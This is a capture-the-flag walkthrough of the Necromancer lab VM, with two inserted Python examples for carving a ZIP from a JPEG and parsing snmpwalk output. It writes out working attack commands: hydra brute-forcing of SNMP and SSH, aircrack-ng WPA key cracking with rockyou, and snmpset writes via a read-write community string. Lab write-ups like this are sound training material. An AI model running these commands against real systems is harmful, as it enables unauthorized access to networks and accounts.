Necromancer Walkthrough
Next on the list of walkthroughs to be transcribed to my new domain is Necromancer. This is a good multi-layered CTF which taught me a lot when I did it back in mid-2016. What things appear to be, can often be a trick!
Rather than simply copy my previous writeup, I decided to reroot the box afresh as I couldn’t remember anything. It was pretty heartening to see my improved methodology and TTPs work well.
Standard Nmap enumeration (not paying attention to opsec here, it's a boot2root!)
Initial nmap showed the top 2500 ports were filtered, so let’s add -p-.
nmap -T4 -sV 10.1.1.46
Still nothing. By this time my UDP scan had finished.
nmap -T4 -sU 10.1.1.46 --max-retries 3 --max-rtt-timeout 150ms
Hmmm, p666 is open which Nmap refers to as Doom. What can we enumerate from it?
root@kali:~# nc -nvvvu 10.1.1.46 666
(UNKNOWN) [10.1.1.46] 666 (?) open
hello
You gasp for air! Time is running out!
Couldn’t seem to get anything else out of the box. Luckily, I’d developed a TTP of starting a packet capture as soon as I booted the machine so decided to have a peruse of that.
I noticed the box was ARPing like mad across the subnet, but also it was trying to connect to my box on p4444. In the screenshots I have highlighted the initial TCP connection but also my kali machine dropping it with a TCP RST.
So I could find out what was being sent, I set up a netcat listener.
root@kali:~# nc -lnvvvp 4444
listening on [any] 4444 ...
I received a connect shortly with the following string.
root@kali:~# nc -lnvvvp 4444
listening on [any] 4444 ...
connect to [10.1.1.128] from (UNKNOWN) [10.1.1.46] 40914
<massive base64 string>
 sent 0, rcvd 1424
Obviously some form of encoding, looks a bit like base64. Let’s decode it.
cat necromancer.txt | base64 -d
Welcome! You find yourself staring towards the horizon, with nothing but silence surrounding you. You look east, then south, then west, all you can see is a great wasteland of nothingness. Turning to your north you notice a small flicker of light in the distance. You walk north towards the flicker of light, only to be stopped by some type of invisible barrier. The air around you begins to get thicker, and your heart begins to beat against your chest. You turn to your left.. then to your right! You are trapped! You fumble through your pockets.. nothing! You look down and see you are standing in sand. Dropping to your knees you begin to dig frantically. As you dig you notice the barrier extends underground! Frantically you keep digging and digging until your nails suddenly catch on an object. You dig further and discover a small wooden box. flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid. You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"
So then, let’s look at UDP p666! I pasted the flag1 string into netcat but received an error.
root@kali:~# nc -nvvu 10.1.1.46 666
(UNKNOWN) [10.1.1.46] 666 (?) open
e6078b9b1aac915d11b9fd59791030bf
Chant had no affect! Try in a different tongue!
Chant had no affect! Try in a different tongue!
Not quite there yet then. Different tongue suggests different format. hash-identifier to the rescue! Reported as an md5 hash, let's get the plaintext.
HASH: e6078b9b1aac915d11b9fd59791030bf
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Hashkiller.co.uk reports the hash as opensesame. Hurrah! Let’s get back to UDP p666.
root@kali:~# nc -nvvu 10.1.1.46 666
(UNKNOWN) [10.1.1.46] 666 (?) open
opensesame
A loud crack of thunder sounds as you are knocked to your feet! Dazed, you start to feel fresh air entering your lungs. You are free! In front of you written in the sand are the words: flag2{c39cd4df8f2e35d20d92c2e44de5f7c6} As you stand to your feet you notice that you can no longer see the flicker of light in the distance. You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon. As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface. The birds get closer, and closer, and closer. Staring up at the crows you can see they are in a formation. Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80. As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence. 666 is closed.
Flag2 looks like it could be an md5 too, let's check!
Hashkiller reports the plaintext as 1033750779, which doesn’t look promising. The narrative makes mention of numeral 80 however…. Webserver?
root@kali:~# nmap -T4 -p80 10.1.1.46
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-03 13:16 BST
Nmap scan report for 10.1.1.46
Host is up (0.00043s latency).
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:22:27:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Manual browsing reveals a plaintext HTML site. Nothing interesting in the source file. I fired up dirb and nikto in the background whilst I had a think.
Whilst it was running I grabbed the embedded image to see if there was any interesting exif data or similar. I cycled through various exif tools and the strings / file command with limited joy. I thought I was stuck so restarted my enumeration, but still ran into the same block.
Googling revealed binwalk, which when run said there was a zip archive in the jpeg too.
root@kali:~/tools/Image-ExifTool-10.60# binwalk pileoffeathers.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, little-endian offset of first image directory: 8
270           0x10E           Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http
36994         0x9082          Zip archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 125, name: feathers.txt
37267         0x9193          End of Zip archive
Having messed about with various unzipping utilities that wouldn’t run against a jpeg, I eventually realised that binwalk can also extract known file types. Doh.
root@kali:/Necromancer# binwalk -e pileoffeathers.jpg
root@kali:/Necromancer# ls
necromancer.txt  pileoffeathers.jpg  _pileoffeathers.jpg.extracted
root@kali:/Necromancer# cd _pileoffeathers.jpg.extracted
root@kali:/Necromancer/_pileoffeathers.jpg.extracted# ls
9082.zip  feathers.txt
Catting feathers.txt reveals another base64 string, which decoded becomes:
root@kali:/Necromancer/_pileoffeathers.jpg.extracted# cat feathers.txt | base64 -d
flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm
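What binwalk did above was a signature scan followed by a carve: it found a ZIP local-file header after the JPEG's end-of-image marker and cut the archive out at that offset. The following is an added example (not part of the original walkthrough or of binwalk) that performs the same carve in Python on a constructed JPEG-plus-ZIP sample; the sample's archived text is a placeholder, not the real feathers.txt. It also checks for the polyglot on the way in, which is the same test a defender would run on uploaded images.

```python
import base64
import io
import struct
import zipfile

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
ZIP_LOCAL_HDR = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"


# Constructed sample standing in for pileoffeathers.jpg: a minimal JPEG-shaped
# blob (SOI, APP0 stub, padding, EOI) with a ZIP archive appended after the EOI.
# The archived text is a placeholder, not the real feathers.txt content.
def build_sample() -> bytes:
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64 + JPEG_EOI
    payload = base64.b64encode(b"flagN{constructed-placeholder} - /constructedpath")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("feathers.txt", payload + b"\n")
    return jpeg + buf.getvalue()


def find_appended_zip(data: bytes):
    """Locate a ZIP archive appended to a JPEG, as binwalk's signature scan does.
    Returns (offset, zip_bytes) or None; the offset is relative to file start."""
    if not data.startswith(JPEG_SOI):
        return None
    start = data.find(ZIP_LOCAL_HDR, 2)
    # An EOI must precede the archive. rfind copes with EXIF thumbnails, which
    # carry their own SOI/EOI pair inside the main image.
    if start == -1 or data.rfind(JPEG_EOI, 0, start) == -1:
        return None
    eocd = data.rfind(ZIP_EOCD)
    if eocd == -1 or eocd < start:
        return None
    # The EOCD record is 22 bytes plus an optional comment; its length is at +20.
    comment_len = struct.unpack("<H", data[eocd + 20:eocd + 22])[0]
    return start, data[start:eocd + 22 + comment_len]


def read_archive(zip_bytes: bytes) -> dict:
    """Map each member name to its bytes. Carving first keeps the central
    directory offsets valid, since they are relative to the archive start."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def decode_member(raw: bytes) -> str:
    # feathers.txt on the box was base64; validate strictly so a member that
    # is not base64 raises instead of being silently mangled.
    return base64.b64decode(raw.strip(), validate=True).decode()


if __name__ == "__main__":
    sample = build_sample()
    found = find_appended_zip(sample)
    if found:
        off, zb = found
        print(f"zip archive at decimal {off} (0x{off:x}), {len(zb)} bytes")
        for name, raw in read_archive(zb).items():
            print(name, "->", decode_member(raw))
```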
Manual browsing to /amagicbridgeappearsatthechasm reveals a new page.
It waffles on about some magic but says that I need a special item to protect me. At this point I’m pretty damned stumped and start googling for magic items!
Note to all CTF authors: It’s meant to be a technical challenge, not a challenge to follow your convoluted thought process.
I took a hint and looked at another walkthrough that mentioned I needed a list of terms related to the occult / magic. He used a bash script to wget the page then sort through it. I decided to use the slightly more elegant CeWL.
cewl https://en.wikipedia.org/wiki/List_of_occult_terms -m4 -d0 -w necromancer.txt
I tried feeding this to dirb but got nowhere.
dirb http://10.1.1.46 necromancer.txt
The next day I tried again, except putting the full current path into dirb…..
dirb http://10.1.1.46/amagicbridgeappearsatthechasm necromancer.txt
Bingo. /talisman. Obscure and you could spend months working at it without realising you needed a wordlist made from the internet. Author fail.
I visited the URL amagicbridgeappearsatthechasm/talisman and received a file download. I had a look at it using file and strings, it’s definitely a binary!
Now I started to get a bit confused, my experience of linux binaries is limited to Crossfire BoF and similar. I tried opening it in various editors and programs. I did also learn about readelf though, so time wasn’t wasted.
Eventually I thought I’d try and connect a debugger to it and that led to three evenings of Googling on the best options.
I decided upon gdb and resumed Googling and familiarising myself with the help file.
A few tutorials suggested looking into the functions within a binary. I ran info functions after coming across this link.
(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080482d0  _init
0x08048310  printf@plt
0x08048320  __libc_start_main@plt
0x08048330  __isoc99_scanf@plt
0x08048350  _start
0x08048380  __x86.get_pc_thunk.bx
0x08048390  deregister_tm_clones
0x080483c0  register_tm_clones
0x08048400  __do_global_dtors_aux
0x08048420  frame_dummy
0x0804844b  unhide
0x0804849d  hide
0x080484f4  myPrintf
0x08048529  wearTalisman
0x08048a13  main
0x08048a37  chantToBreakSpell
0x08049530  __libc_csu_init
0x08049590  __libc_csu_fini
0x08049594  _fini
Slightly blindly, and without 100% understanding what I was doing, I set a breakpoint at wearTalisman. My reasoning was that that seemed to be the bit that kicked me out of the program, so if I stop there and see what is going on, I can make a better informed decision. At this point I was still stuck in the ‘find JMP ESP, insert shellcode’ mentality.
I thought back to the function list. I’d put the breakpoint on wearTalisman and had the chance to issue commands using gdb. I tried jumping to the other function.
(gdb) jmp chantToBreakSpell
Undefined command: "jmp".  Try "help".
(gdb) jump chantToBreakSpell
Line 0 is not in `__isoc99_scanf'.  Jump anyway? (y or n) y
Continuing at 0x8048a3b.
Do you want to wear the talisman?
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You fall to your knees.. weak and weary. Looking up you can see the spell is still protecting the cave entrance. The talisman is now almost too hot to touch! Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Lovely! Let's get that next step cracked! Chanting the flag directly at UDP p31337 gave me the same message as previously, about using a different tongue.
Hashkiller.co.uk reveals the plaintext: blackmagic
Chanting to UDP p31337 with blackmagic reveals a wall of text.
root@kali:/Necromancer: nc -nvvu 10.1.1.46 31337
(UNKNOWN) [10.1.1.46] 31337 (?) open
blackmagic
As you chant the words, a hissing sound echoes from the ice walls. The blue aura disappears from the cave entrance. You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain. You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze. The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind. Suddenly, you are attacked by a swarm of bats! You aimlessly thrash at the air in front of you! The bats continue their relentless attack, until.... silence. Looking around you see no sign of any bats, and no indication of the struggle which had just occurred. Looking towards one of the torches, you see something on the cave wall. You walk closer, and notice a pile of mutilated bats lying on the cave floor. Above them, a word etched in blood on the wall.
/thenecromancerwillabsorbyoursoul
flag5{0766c36577af58e15545f099a3b15e60}
Manual browsing to the path (from the root this time, not from the existing path of amagicbridgeappearsatthechasm/) gives us a new page. URL: http://10.1.1.46/thenecromancerwillabsorbyoursoul/ Flag6 is on here too: b1c3ed8f1db4258e4dcb0ce565f6dc03
There is a hyperlink to a bin file which I downloaded. I also downloaded the necromancer image and ran exiftool on it. There was lots of output but this stood out:
Thumbnail Image : (Binary data 4505 bytes, use -b option to extract)
I tried to grab the binary data but didn’t have any luck at first. I shelved it and focused on the binary file. The file command revealed it to be bzip2 compressed data.
I tried to decompress it with
tar -xvf necromancer
but received an error about changing ownership to 0 (root). I reckon this is something to do with root squashing as my files are held in an NFS mount. I managed to get hold of the contents which appeared to be a necromancer.cap file. Quick Google revealed this to be similar to a pcap from Wireshark. I imported it into Wireshark and began to read through it. Lots of 802.11 traffic.
Aircrack has an option to import cap files. I tried using my previous CeWL wordlist.
aircrack-ng necromancer.cap -w necromancer.txt
But received no hits. I fired up the rockyou list and got a hit with death2all.
                                 Aircrack-ng 1.2 rc4

      [00:00:10] 16104/9822768 keys tested (1492.56 k/s)

      Time left: 1 hour, 49 minutes, 32 seconds                      0.16%

                           KEY FOUND! [ death2all ]


      Master Key     : 7C F8 5B 00 BC B6 AB ED B0 53 F9 94 2D 4D B7 AC
                       DB FA 53 6F A9 ED D5 68 79 91 84 7B 7E 6E 0F E7

      Transient Key  : EB 8E 29 CE 8F 13 71 29 AF FF 04 D7 98 4C 32 3C
                       56 8E 6D 41 55 DD B7 E4 3C 65 9A 18 0B BE A3 B3
                       C8 9D 7F EE 13 2D 94 3C 3F B7 27 6B 06 53 EB 92
                       3B 10 A5 B0 FD 1B 10 D4 24 3C B9 D6 AC 23 D5 7D

      EAPOL HMAC     : F6 E5 E2 12 67 F7 1D DC 08 2B 17 9C 72 42 71 8E
I was a bit stuck, as I couldn’t seem to see the ‘finish’. I clicked about whilst working out what to do, and noticed I’d missed something on:
http://10.1.1.46/thenecromancerwillabsorbyoursoul/.
There was a reference to u161 – SNMP. I fired up my SNMP enumeration tools to have a look. I couldn’t connect with public, private or necromancer as the community strings.
I thought about bruteforcing it with rockyou but realised it would take forever. I tried with my custom wordlist from before (I had manually added necromancer, talisman and death2all to it).
hydra -P necromancerwords.txt -t 50 -w 3 -f -v 10.1.1.46 snmp
I received a hit, with death2all. Now I will try to connect and enumerate fully.
snmp-check 10.1.1.46 -c death2all
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2all'

[*] System information:

  Host IP address               : 10.1.1.46
  Hostname                      : Fear the Necromancer!
  Description                   : You stand in front of a door.
  Contact                       : The door is Locked. If you choose to defeat me, the door must be Unlocked.
  Location                      : Locked - death2allrw!
  Uptime snmp                   : -
  Uptime system                 : -
  System date                   : -
I read up on the structure of OIDs and MIBs in SNMP. MIBs = hierarchical info types. OIDs = individual fields of info within that hierarchy.
I needed to find the 'location field' and its OID. snmpwalk provided a bit more info.
snmpwalk -c death2all -v1 10.1.1.46
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
I noted the death2allrw string. Connecting with:
snmpwalk -c death2allrw -v1 10.1.1.46
This gave me more than enough information! I started to think about writing to snmp strings if I have rw access. I needed to tighten up my syntax now I knew the exact string I needed to write to.
snmpwalk -c death2allrw -v1 10.1.1.46 | grep Locked
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
I made sure I definitely had read/write access to the strings before I disappeared down a rabbit hole. The snmp-check script has a -w option that checks that permission in detail.
snmp-check -w 10.1.1.46 -c death2allrw
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2allrw'
[+] Write access check enabled

[*] Write access permitted!
Between the two snmp tools I knew I had write access, and the string to write to (iso.3.6.1.2.1.1.6.0).
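The OIDs above all sit in the SNMPv2-MIB "system" group (1.3.6.1.2.1.1), where the MIB defines sysContact, sysName and sysLocation as read-write and the rest as read-only, which is why a read-write community can rewrite the "Locked" location string. This added example (not from the walkthrough or from net-snmp) parses the snmpwalk output shown above, maps each OID to its system-group name and access level, and lists the writable objects mentioning "Locked"; the sample lines are the page's own output, embedded as a constant.

```python
import re

# SNMPv2-MIB "system" group (OID 1.3.6.1.2.1.1) from RFC 3418. The access
# column is the MIB's MAX-ACCESS: only three leaves are read-write, which is
# why an rw community can change sysLocation but never sysDescr.
SYSTEM_GROUP = "1.3.6.1.2.1.1"
SYSTEM_LEAVES = {
    1: ("sysDescr", "read-only"), 2: ("sysObjectID", "read-only"),
    3: ("sysUpTime", "read-only"), 4: ("sysContact", "read-write"),
    5: ("sysName", "read-write"), 6: ("sysLocation", "read-write"),
    7: ("sysServices", "read-only"),
}

# Constructed sample: the four lines snmpwalk returned in the walkthrough.
SAMPLE_WALK = '''iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
'''

LINE_RE = re.compile(r'^(\S+) = ([A-Za-z0-9-]+): (.*)$')


def normalise_oid(oid: str) -> str:
    """net-snmp prints the root arc as 'iso'; the numeric form is 1."""
    return "1" + oid[3:] if oid.startswith("iso.") else oid.lstrip(".")


def describe_oid(oid: str):
    """Return (name.instance, access) for system-group OIDs, else (oid, 'unknown')."""
    if oid.startswith(SYSTEM_GROUP + "."):
        leaf, _, instance = oid[len(SYSTEM_GROUP) + 1:].partition(".")
        if leaf.isdigit() and int(leaf) in SYSTEM_LEAVES:
            name, access = SYSTEM_LEAVES[int(leaf)]
            return f"{name}.{instance}", access
    return oid, "unknown"


def parse_walk(text: str) -> list:
    """Parse snmpwalk output into (numeric_oid, name, access, value) rows."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines of multi-line STRING values
        oid = normalise_oid(m.group(1))
        vtype, raw = m.group(2), m.group(3)
        value = raw[1:-1] if vtype == "STRING" and raw.startswith('"') else raw
        name, access = describe_oid(oid)
        rows.append((oid, name, access, value))
    return rows


def writable_matches(rows: list, needle: str) -> list:
    """Objects an rw community could overwrite whose value mentions `needle`."""
    return [(oid, name) for oid, name, access, value in rows
            if access == "read-write" and needle in value]


if __name__ == "__main__":
    for oid, name, access, value in parse_walk(SAMPLE_WALK):
        print(f"{oid:20} {name:14} {access:10} {value!r}")
    print("writable and mentioning 'Locked':", writable_matches(parse_walk(SAMPLE_WALK), "Locked"))
```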
I ran snmpset.
snmpset -v1 -c death2allrw 10.1.1.46 iso.3.6.1.2.1.1.6.0 s Unlocked
Check against with snmp-check.
snmp-check 10.1.1.46 -c death2all
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.1.1.46:161 using SNMPv1 and community 'death2all'

[*] System information:

  Host IP address               : 10.1.1.46
  Hostname                      : Fear the Necromancer!
  Description                   : You stand in front of a door.
  Contact                       : The door is unlocked! You may now enter the Necromancer's lair!
  Location                      : flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22
  Uptime snmp                   : -
  Uptime system                 : -
  System date                   : -
The reason I couldn't see the finish was that I hadn't finished! Another flag! Took me a second to notice that TCP p22 reference too (u161 stands up, but I hardly ever see tXYZ written down).
Nmap shows p22 open now. md5 of Flag7 resolved to demonslayer which I try as creds. I try my old wordlist, username as pw and all the basics. No joy. I _hate_ bruteforcing as it is noisy and gets you IP banned. However, I couldn’t think of much else.
Note: -P to specify a password file and -l to specify one user rather than a list of user names.
hydra -P /usr/share/seclists/Passwords/10k_most_common.txt -l demonslayer 10.1.1.46 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-03 17:11:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~9 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 10.1.1.46   login: demonslayer   password: 12345678
Lovely. Let’s get logged in.
I find myself in the homedir. Linuxprivescchecker.py is already loaded and Flag8.txt makes reference to the Necromancer attacking me on UDP p777. I started a listener just in case I had something to catch. (nc -nvvlup 777)
I tried an inbound connection to the box on UDP p777 too. I left it for half an hour in case it was a timed event. Nothing had happened. I remembered on my OSCP labs that sometimes what you can see from the box itself, is different to what you can see from outside the box.
I began to enumerate what tools were on the box. No nmap, no nano (annoying to bash script multi-line without it). Vi was installed but I valued my sanity too much. NetCat was installed but it didn't support the -z port scan option (course it didn't!)
Again, take a break and think. May as well try UDP p777 directly rather than scanning…..
nc -nvvvvu 127.0.0.1 777
Connection to 127.0.0.1 777 port [udp/*] succeeded!
** You only have 3 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 2 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 1 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
** You only have 0 hitpoints left! **
Defend yourself from the Necromancer's Spells!
Where do the Black Robes practice magic of the Greater Path?
!!!!!!! You have been defeated by The Necromancer! (*_*) !!!!!!!
Slightly harsh. I didn’t even type anything! I ssh back in and try again. Nothing. Looks like the VM has crashed, upon restarting it I need to redo my previous exploitation steps! Pain!
A few restarts of the VM and choice words later and I’m back at the Necromancer Battle.
I pwn him using the answers to the questions – happily Google’d.
- Kelewan
- Mephistopheles
- Hedge
Flags 8, 9 and 10 are revealed in the battle.
A small vile (vial?!) is apparently at my feet. It takes me a while to work out I should try and find it rather than waiting for something to happen! A dot file entitled .smallvile is found in the current directory.
Reading the file mentions a great power. I make a brew and I am reminded of the message of Sudo – ‘With great power comes great responsibility.’
cat .smallvile
You pick up the small vile. Inside of it you can see a green liquid. Opening the vile releases a pleasant odour into the air. You drink the elixir and feel a great power within your veins!
I try to list out my sudo permissions with sudo -l
sudo -l
Matching Defaults entries for demonslayer on thenecromancer:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User demonslayer may run the following commands on thenecromancer:
    (ALL) NOPASSWD: /bin/cat /root/flag11.txt
So I can run the cat command against a flag file hidden in root’s directory. Pretty simple.
sudo cat /root/flag11.txt
Another VM completed! Yet another md5 which becomes…… hackergod!